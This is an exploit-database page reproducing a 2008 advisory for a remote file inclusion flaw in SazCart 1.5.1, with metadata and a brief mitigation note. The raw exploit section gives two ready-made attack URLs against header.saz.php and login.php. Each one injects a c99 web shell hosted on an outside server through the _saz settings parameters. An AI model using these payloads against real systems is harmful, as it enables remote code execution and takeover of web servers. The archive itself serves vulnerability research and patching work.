header-logo
Suggest Exploit
vendor:
SazCart
by:
RoMaNcYxHaCkEr
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: SazCart
Affected Version From: 1.5.2001
Affected Version To: 1.5.2001
Patch Exists: NO
Related CWE: N/A
CPE: a:sazcart:sazcart:1.5.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SazCart 1.5.1 Multiple Remote File Include Vulnerability

SazCart 1.5.1 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Disable register_globals and ensure that input is properly sanitized and validated.
Source

Exploit-DB raw data:

-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : SazCart 1.5.1 Multiple Remote File Include Vulnerability

# Download From : http://www.sazcart.com/site/download.php?id=16

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  www.4rxh.com     &         www.nb3.cc        

+======================================================================================================================+

# Exploits :

* Must Be Register_Globals Is On

http://WwW.4RxH.CoM/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum & Anyone Hate Me  :) 

# For Contact : webmaster@4rxh.com

# bEST wISHES

-==========================================[ ViVa Islam + YeMeN ]====================================-

# milw0rm.com [2008-05-08]

Navigation

Suggest Exploit

Services By CQR